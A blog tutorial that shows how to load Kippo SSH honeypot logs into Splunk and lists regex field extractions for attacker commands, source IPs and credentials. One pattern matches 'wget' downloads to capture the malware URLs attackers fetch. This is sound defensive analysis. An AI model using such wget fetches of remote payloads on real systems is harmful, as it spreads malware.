Using Splunk for Kippo Honeypot Log Analysis

I was recently asked how I can quickly and efficiently analyze Kippo results. The secret is generating an additional log with Kippo, and inputting the results into Splunk. Since this data could be useful for researchers everywhere, I've decided to type up a quick tutorial.


In order to have Kippo generate the needed log, you need to create a batch file or shell script designed to generate the log.

For Windows, your batch file will look something like this:
twistd.py -y kippo.tac >> "Kippo.log"

For non-Windows, logging is already enabled by default, and will be saved to:
log/kippo.log 

Once Kippo is generating logs, you can either upload these logs to Splunk manually, or use Splunk's Universal Forwarder to upload automatically.



Once the logs are in Splunk, you'll need to start generating fields so you can search for data and export it more easily. As an example, I'll show you how I built the field for "Kippo-CmdFull" which provides the full command which an attacker entered during a session. Please note I'm using a slightly older version of Splunk so your screens may look different.

First, do a search for what we're looking for.  In this case, search for "command found".


Once you've found the data you're looking for, use the drop down arrow and select "Extract Fields".


Enter a few commands which you know are present in the log, such as "ls -a" "rm" or "cd".


You'll get some extra data which needs to be filtered out. Unfortunately Splunk can't always auto-generate the fields accurately if only a few examples are provided.


Ultimately after some filtering of extra results you'll hopefully get something meaningful.


If not, you'll need to resort to using Regular Expressions.



After your fields are generated, you can perform all sorts of statistical analysis on commands used.



For reference, here are the Splunk Regex fields I have created so far. Please feel free to use them in your own analysis.

Kippo : EXTRACT-Kippo_CmdBase Inline  
(?i)found: (?P<Kippo_CmdBase>[^ ]+)

Kippo : EXTRACT-Kippo_CmdFull Inline  
(?i) found: (?P<Kippo_CmdFull>.+)

Kippo : EXTRACT-Kippo_ConnectStatus Inline  
(?i)/.*?\] (?P<Kippo_ConnectStatus>\w+)

Kippo : EXTRACT-Kippo_MalwareURL Inline  
(?i) wget (?P<Kippo_MalwareURL>.+)

Kippo : EXTRACT-Kippo_SessionID Inline  
(?i)^(?:[^,]*,){1}(?P<Kippo_SessionID>[^\]]+)

Kippo : EXTRACT-Kippo_SessionNumber Inline  
(?i)\[.*?,(?P<Kippo_SessionNumber>\d+)(?=,)

Kippo : EXTRACT-Kippo_SourceClient Inline  
(?i) version: (?P<Kippo_SourceClient>.+)

Kippo : EXTRACT-Kippo_SourceIP Inline  
(?i)^(?:[^,]*,){2}(?P<Kippo_SourceIP>[^\]]+)

Kippo : EXTRACT-Kippo_StatusMsg Inline  
(?i)^(?:[^ ]* ){3}(?P<Kippo_StatusMsg>.+)

Kippo : EXTRACT-Kippo_TargetPass Inline  
(?i)\[.*?/(?P<Kippo_TargetPass>\w+)(?=\])

Kippo : EXTRACT-Kippo_TargetUser Inline  
(?i) .*? \[(?P<Kippo_TargetUser>\w+)(?=/)

No comments:

Post a Comment